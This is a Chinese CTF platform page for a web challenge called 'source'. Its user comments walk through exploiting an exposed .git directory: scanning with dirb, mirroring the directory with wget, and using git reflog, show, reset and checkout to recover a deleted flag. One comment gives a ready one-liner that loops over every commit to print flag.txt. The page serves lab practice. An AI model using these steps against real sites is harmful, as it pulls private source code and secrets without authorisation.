sourceWEB 未解决

分数: 20 金币: 3
题目作者: vFREE
一  血: dotast
一血奖励: 3金币
解  决: 11484
提  示:
描  述:
我哥说渗透我只用linux环境
评论
9427 4年前

烟雾弹有点多

回复 0

Jackbanbo 4年前

照顾一下新手,之后 就看到 好多commit_ID,flag-is-here?,一个一个试,如 git show 412adb6 或git show 13ce8d0,第二个就有flag

回复 0

Jackbanbo 4年前

真无语,弹幕里都是大佬 理解难啊,我说一下吧wget下载后先进入114xxx目录=》再使用git reflog

回复 0

Z1ek34R 4年前

xixi

回复 0

小赵同学 4年前

emmmm

回复 0

Taer 4年前

git is.......差点默认以为这个也是假的flag

回复 0

chun 4年前

一看Linux系统 先用dirb 扫描,发现存在.git目录 用wget -r http://ip_address/.git 递归下载下来,进入文件夹 git reflog (查看执行的命令日志) git show commit_id (查看某次commit的内容) 成功得到flag

回复 19
gogogogogoEcho 3年前

sang lang he +1

回复 0

18340362523 4年前

简单易懂,不粗大佬

回复 0

成朗 4年前

多谢大佬的解答,爱您!撒浪嘿

回复 3

2694218551 5年前

下载源码后 git reflog 查看 记录 有可能版本都回退一遍 git reset --hard 版本号 cat flag.txt 我的是在 40c6d51 这个版本中找到的,其他都是假flag

回复 2

ttw_is_here 5年前

wget -r http://114.67.246.176:PORT/.git&&cd 114.67.246.176* && for i in `git reflog|awk '{print $1}' `;do git cat-file -p `git ls-tree $i|grep flag.txt|awk '{print $3}'` 2>/dev/null;done;

回复 6

HaNkLe 5年前

1. 先扫描网站目录,发现 .git 频繁出现,于是第一反应是 .git 泄露,于是打开网页 http://ip_address/.git,看到的确存在 git 泄露; 2. wget -r http://ip_address/.git 递归下载 .git 目录文件,得到一个文件夹 3. 执行 git reflog 查看执行的命令日志,发现 commit ID 为 13ce8d0

回复 8
after 5年前

@HaNkLe 好嘞,谢谢表哥,3Q

回复 0

HaNkLe 5年前

@after 评论长度有限,就给我截了。接上文:执行 git reset 13ce8d0,回退到该版本的版本库,然后执行 git status 会发现 delete flag.txt,然后执行 git checkout -- flag.txt 将暂存区的 flag.txt 还原到工作区

回复 5

after 5年前

好多commit ID,用哪一个,然后找到id,flag呢

回复 0

夜布多555 5年前

谢大佬

回复 0

junlebao 5年前

多谢大佬提示

回复 0

fallingskies 5年前

射射兄弟

回复 0

WriteUp

image
DarLing02

3 金币

评分(40)

解题动态

frozenfish0x 攻破了该题 12小时前
lps1333 攻破了该题 1天前
dwqinm 攻破了该题 1天前
1363006503 攻破了该题 1天前
13663937822 攻破了该题 1天前
不要用手机号 攻破了该题 2天前
3373441596 攻破了该题 2天前
pengyu 攻破了该题 2天前
Wu. 攻破了该题 2天前
muerjing 攻破了该题 3天前
我就是法核 攻破了该题 3天前
wait123 攻破了该题 3天前
高鉴琪 攻破了该题 3天前
我可不可以都要 攻破了该题 3天前
Big Octopus 攻破了该题 3天前
琅琊的黄昏 攻破了该题 3天前
zhaocaicai 攻破了该题 3天前
qazxswedcvf 攻破了该题 3天前
LGuo 攻破了该题 3天前
flag大王 攻破了该题 4天前
问题反馈